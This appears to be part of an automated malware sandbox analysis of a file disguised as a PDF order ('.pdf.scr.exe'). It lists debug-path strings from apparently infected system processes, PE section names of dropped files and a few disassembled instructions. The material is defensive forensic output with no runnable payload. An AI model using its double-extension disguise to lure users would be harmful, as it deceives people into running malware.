Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000002.00000003.2172656411.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000008.00000003.3191762668.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdb source: elevation_service.exe, 00000008.00000003.2930503642.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000002.00000003.2113247615.0000000001470000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2104394159.00000000015E0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000008.00000003.3180869752.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: elevation_service.exe, 00000008.00000003.3249533485.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: elevation_service.exe, 00000008.00000003.3248356651.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: pingsender.pdb source: alg.exe, 00000002.00000003.2358775588.00000000004C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: elevation_service.exe, 00000008.00000003.3246866849.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: elevation_service.exe, 00000008.00000003.2821521866.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: elevation_service.exe, 00000008.00000003.3235518445.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: alg.exe, 00000002.00000003.1821426163.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb source: alg.exe, 00000002.00000003.1804046994.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: elevation_service.exe, 00000008.00000003.3246000080.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb source: alg.exe, 00000002.00000003.1710268245.00000000015C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000002.00000003.2172656411.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000008.00000003.3191762668.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: firefox.pdb source: alg.exe, 00000002.00000003.2334420956.00000000004C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdbGCTL source: elevation_service.exe, 00000008.00000003.2908936431.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000008.00000003.2893603970.0000000000830000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000008.00000003.2895104361.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000002.00000003.2003390903.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: firefox.pdbP source: alg.exe, 00000002.00000003.2334420956.00000000004C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: elevation_service.exe, 00000008.00000003.3246866849.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: GoogleUpdate_unsigned.pdb source: elevation_service.exe, 00000008.00000003.3229747575.0000000001460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000002.00000003.2019997870.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdb source: elevation_service.exe, 00000008.00000003.2908936431.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000008.00000003.2893603970.0000000000830000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000008.00000003.2895104361.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: elevation_service.exe, 00000008.00000003.3241252093.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: elevation_service.exe, 00000008.00000003.3249533485.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: elevation_service.exe, 00000008.00000003.3235518445.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000002.00000003.2113247615.0000000001470000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2104394159.00000000015E0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000008.00000003.3180869752.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: surmit.exe, 00000007.00000003.1720282746.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, surmit.exe, 00000007.00000003.1721982682.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, surmit.exe, 00000019.00000003.1842133284.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, surmit.exe, 00000019.00000003.1845782469.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, surmit.exe, 0000001C.00000003.1871704458.0000000004A90000.00000004.00001000.00020000.00000000.sdmp, surmit.exe, 0000001C.00000003.1874030134.0000000004C30000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: TieringEngineService.pdbGCTL source: elevation_service.exe, 00000008.00000003.3022810009.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: TieringEngineService.pdb source: elevation_service.exe, 00000008.00000003.3022810009.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdb source: Order SMG 201906 20190816order.pdf.scr.exe, 00000000.00000003.1671928679.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: elevation_service.exe, 00000008.00000003.3244398060.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdb source: elevation_service.exe, 00000008.00000003.2853593033.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: elevation_service.exe, 00000008.00000003.2821521866.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: elevation_service.exe, 00000008.00000003.3244398060.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: snmptrap.pdb source: elevation_service.exe, 00000008.00000003.2949349411.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 00000002.00000003.2068666301.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000002.00000003.2169021270.00000000015E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000002.00000003.2096908826.00000000015E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000002.00000003.2156038493.0000000001470000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2149245390.00000000015E0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2148327892.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000008.00000003.3189590944.00000000007C0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000008.00000003.3189700078.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdb source: elevation_service.exe, 00000008.00000003.2867483561.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: elevation_service.exe, 00000008.00000003.3243580949.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000002.00000003.1975568449.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: elevation_service.exe, 00000008.00000003.3245192353.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: RegSvcs.exe, 00000009.00000002.1737482854.00000000036A5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: crashreporter.pdb source: alg.exe, 00000002.00000003.2294220275.00000000004C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: elevation_service.exe, 00000008.00000003.3247717995.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 00000002.00000003.2092326400.00000000015E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: WmiApSrv.pdbGCTL source: elevation_service.exe, 00000008.00000003.3110281493.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000002.00000003.2003390903.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000002.00000003.1804046994.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdb source: elevation_service.exe, 00000008.00000003.2925406649.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000008.00000003.2916919565.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000002.00000003.1975568449.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: private_browsing.pdb source: alg.exe, 00000002.00000003.2384944423.00000000004C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000002.00000003.2156038493.0000000001470000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2149245390.00000000015E0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2148327892.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000008.00000003.3189590944.00000000007C0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000008.00000003.3189700078.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000002.00000003.1931467591.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000002.00000003.2019997870.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: elevation_service.exe, 00000008.00000003.3241252093.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000002.00000003.1792845772.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: elevation_service.exe, 00000008.00000003.3239648950.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdb source: alg.exe, 00000002.00000003.2183358754.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2186527465.00000000015E0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000008.00000003.3193969354.0000000001460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 64BitMAPIBroker.pdb source: alg.exe, 00000002.00000003.2078085163.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdbGCTL source: elevation_service.exe, 00000008.00000003.2885089406.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: snmptrap.pdbGCTL source: elevation_service.exe, 00000008.00000003.2949349411.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdbGCTL source: elevation_service.exe, 00000008.00000003.2853593033.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000002.00000003.2063806988.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: elevation_service.exe, 00000008.00000003.3248356651.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: elevation_service.exe, 00000008.00000003.3246000080.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: private_browsing.pdbp source: alg.exe, 00000002.00000003.2384944423.00000000004C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000002.00000003.2096908826.00000000015E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 00000002.00000003.2068666301.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: elevation_service.exe, 00000008.00000003.3242799638.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: elevation_service.exe, 00000008.00000003.3243580949.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 00000002.00000003.2092326400.00000000015E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb` source: alg.exe, 00000002.00000003.1710268245.00000000015C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: elevation_service.exe, 00000008.00000003.3242024385.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: WmiApSrv.pdb source: elevation_service.exe, 00000008.00000003.3110281493.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000002.00000003.2030490123.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb="roG)T5n source: RegSvcs.exe, 0000001D.00000002.1952955532.0000000000DF0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: elevation_service.exe, 00000008.00000003.3247717995.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: elevation_service.exe, 00000008.00000003.3245192353.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdbGCTL source: Order SMG 201906 20190816order.pdf.scr.exe, 00000000.00000003.1671928679.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: elevation_service.exe, 00000008.00000003.2847524053.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: alg.exe, 00000002.00000003.1821426163.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdbGCTL source: elevation_service.exe, 00000008.00000003.2925406649.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000008.00000003.2916919565.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: elevation_service.exe, 00000008.00000003.3242799638.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: elevation_service.exe, 00000008.00000003.3242024385.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: default-browser-agent.pdb source: alg.exe, 00000002.00000003.2316244743.00000000004C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ssh-agent.pdbX source: elevation_service.exe, 00000008.00000003.3008858965.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: updater.pdb source: alg.exe, 00000002.00000003.2406594468.00000000004C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdb source: alg.exe, 00000002.00000003.2169021270.00000000015E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000002.00000003.2030490123.0000000001550000.00000004.00001000.00020000.00000000.sdmp

Source: alg.exe.0.dr

Static PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Code function: 0_2_0041E01E LoadLibraryA,GetProcAddress,

0_2_0041E01E

Source: armsvc.exe.0.dr	Static PE information: section name: .didat
Source: alg.exe.0.dr	Static PE information: section name: .didat
Source: GoogleCrashHandler64.exe.2.dr	Static PE information: section name: _RDATA
Source: GoogleCrashHandler64.exe.2.dr	Static PE information: section name: .gxfg
Source: GoogleCrashHandler64.exe.2.dr	Static PE information: section name: .gehcont
Source: GoogleUpdateComRegisterShell64.exe.2.dr	Static PE information: section name: _RDATA
Source: GoogleUpdateComRegisterShell64.exe.2.dr	Static PE information: section name: .gxfg
Source: GoogleUpdateComRegisterShell64.exe.2.dr	Static PE information: section name: .gehcont
Source: elevation_service.exe.2.dr	Static PE information: section name: .00cfg
Source: elevation_service.exe.2.dr	Static PE information: section name: .gxfg
Source: elevation_service.exe.2.dr	Static PE information: section name: .retplne
Source: elevation_service.exe.2.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe.2.dr	Static PE information: section name: malloc_h
Source: maintenanceservice.exe.2.dr	Static PE information: section name: .00cfg
Source: maintenanceservice.exe.2.dr	Static PE information: section name: .voltbl
Source: maintenanceservice.exe.2.dr	Static PE information: section name: _RDATA
Source: 117.0.5938.132_chrome_installer.exe.2.dr	Static PE information: section name: .00cfg
Source: 117.0.5938.132_chrome_installer.exe.2.dr	Static PE information: section name: .retplne
Source: elevation_service.exe0.2.dr	Static PE information: section name: .00cfg
Source: elevation_service.exe0.2.dr	Static PE information: section name: .gxfg
Source: elevation_service.exe0.2.dr	Static PE information: section name: .retplne
Source: elevation_service.exe0.2.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe0.2.dr	Static PE information: section name: malloc_h
Source: Acrobat.exe.2.dr	Static PE information: section name: .didat
Source: Acrobat.exe.2.dr	Static PE information: section name: _RDATA
Source: unpack200.exe.2.dr	Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.2.dr	Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.2.dr	Static PE information: section name: .gxfg
Source: ie_to_edge_stub.exe.2.dr	Static PE information: section name: .retplne
Source: ie_to_edge_stub.exe.2.dr	Static PE information: section name: _RDATA
Source: cookie_exporter.exe.2.dr	Static PE information: section name: .00cfg
Source: cookie_exporter.exe.2.dr	Static PE information: section name: .gxfg
Source: cookie_exporter.exe.2.dr	Static PE information: section name: .retplne
Source: cookie_exporter.exe.2.dr	Static PE information: section name: _RDATA
Source: identity_helper.exe.2.dr	Static PE information: section name: .00cfg
Source: identity_helper.exe.2.dr	Static PE information: section name: .gxfg
Source: identity_helper.exe.2.dr	Static PE information: section name: .retplne
Source: identity_helper.exe.2.dr	Static PE information: section name: _RDATA
Source: identity_helper.exe.2.dr	Static PE information: section name: malloc_h
Source: setup.exe.2.dr	Static PE information: section name: .00cfg
Source: setup.exe.2.dr	Static PE information: section name: .gxfg
Source: setup.exe.2.dr	Static PE information: section name: .retplne
Source: setup.exe.2.dr	Static PE information: section name: LZMADEC
Source: setup.exe.2.dr	Static PE information: section name: _RDATA
Source: setup.exe.2.dr	Static PE information: section name: malloc_h
Source: msedgewebview2.exe.2.dr	Static PE information: section name: .00cfg
Source: msedgewebview2.exe.2.dr	Static PE information: section name: .gxfg
Source: msedgewebview2.exe.2.dr	Static PE information: section name: .retplne
Source: msedgewebview2.exe.2.dr	Static PE information: section name: CPADinfo
Source: msedgewebview2.exe.2.dr	Static PE information: section name: LZMADEC
Source: msedgewebview2.exe.2.dr	Static PE information: section name: _RDATA
Source: msedgewebview2.exe.2.dr	Static PE information: section name: malloc_h
Source: msedge_proxy.exe.2.dr	Static PE information: section name: .00cfg
Source: msedge_proxy.exe.2.dr	Static PE information: section name: .gxfg
Source: msedge_proxy.exe.2.dr	Static PE information: section name: .retplne
Source: msedge_proxy.exe.2.dr	Static PE information: section name: _RDATA
Source: msedge_proxy.exe.2.dr	Static PE information: section name: malloc_h
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: .00cfg
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: .gxfg
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: .retplne
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: LZMADEC
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: _RDATA
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: malloc_h
Source: notification_click_helper.exe.2.dr	Static PE information: section name: .00cfg
Source: notification_click_helper.exe.2.dr	Static PE information: section name: .gxfg
Source: notification_click_helper.exe.2.dr	Static PE information: section name: .retplne
Source: notification_click_helper.exe.2.dr	Static PE information: section name: CPADinfo
Source: notification_click_helper.exe.2.dr	Static PE information: section name: _RDATA
Source: notification_click_helper.exe.2.dr	Static PE information: section name: malloc_h
Source: AcroCEF.exe.2.dr	Static PE information: section name: .didat
Source: AcroCEF.exe.2.dr	Static PE information: section name: _RDATA
Source: SingleClientServicesUpdater.exe.2.dr	Static PE information: section name: .didat
Source: SingleClientServicesUpdater.exe.2.dr	Static PE information: section name: _RDATA
Source: pwahelper.exe.2.dr	Static PE information: section name: .00cfg
Source: pwahelper.exe.2.dr	Static PE information: section name: .gxfg
Source: pwahelper.exe.2.dr	Static PE information: section name: .retplne
Source: pwahelper.exe.2.dr	Static PE information: section name: _RDATA
Source: pwahelper.exe.2.dr	Static PE information: section name: malloc_h
Source: msedge_proxy.exe0.2.dr	Static PE information: section name: .00cfg
Source: msedge_proxy.exe0.2.dr	Static PE information: section name: .gxfg
Source: msedge_proxy.exe0.2.dr	Static PE information: section name: .retplne
Source: msedge_proxy.exe0.2.dr	Static PE information: section name: _RDATA
Source: msedge_proxy.exe0.2.dr	Static PE information: section name: malloc_h
Source: pwahelper.exe0.2.dr	Static PE information: section name: .00cfg
Source: pwahelper.exe0.2.dr	Static PE information: section name: .gxfg
Source: pwahelper.exe0.2.dr	Static PE information: section name: .retplne
Source: pwahelper.exe0.2.dr	Static PE information: section name: _RDATA
Source: pwahelper.exe0.2.dr	Static PE information: section name: malloc_h
Source: MicrosoftEdgeUpdate.exe.2.dr	Static PE information: section name: .didat
Source: MicrosoftEdgeUpdateBroker.exe.2.dr	Static PE information: section name: .didat
Source: MicrosoftEdgeUpdateComRegisterShell64.exe.2.dr	Static PE information: section name: .didat
Source: MicrosoftEdgeUpdateComRegisterShell64.exe.2.dr	Static PE information: section name: _RDATA
Source: MicrosoftEdgeUpdateCore.exe.2.dr	Static PE information: section name: .didat
Source: MicrosoftEdgeUpdateOnDemand.exe.2.dr	Static PE information: section name: .didat
Source: MicrosoftEdgeUpdateSetup.exe.2.dr	Static PE information: section name: .didat
Source: AcroCEF.exe0.2.dr	Static PE information: section name: .didat
Source: AcroCEF.exe0.2.dr	Static PE information: section name: _RDATA
Source: SingleClientServicesUpdater.exe0.2.dr	Static PE information: section name: .didat
Source: SingleClientServicesUpdater.exe0.2.dr	Static PE information: section name: _RDATA
Source: AdobeCollabSync.exe.2.dr	Static PE information: section name: .didat
Source: AdobeCollabSync.exe.2.dr	Static PE information: section name: _RDATA
Source: AppVLP.exe.2.dr	Static PE information: section name: .c2r
Source: OneDriveSetup.exe.2.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_0042C09E push esi; ret	0_2_0042C0A0
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_0042C187 push edi; ret	0_2_0042C189
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_0044B2B1 push FFFFFF8Bh; iretd	0_2_0044B2B3
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00426B05 push ecx; ret	0_2_00426B18
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00409C63 push edi; retn 0000h	0_2_00409C65
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00409DD8 push F7FFFFFFh; retn 0000h	0_2_00409DDD
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_0042BDAA push edi; ret	0_2_0042BDAC
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_0042BEC3 push esi; ret	0_2_0042BEC5
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00BEB180 push 00BEB0CAh; ret	0_2_00BEB061
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00BEB180 push 00BEB30Dh; ret	0_2_00BEB1E6
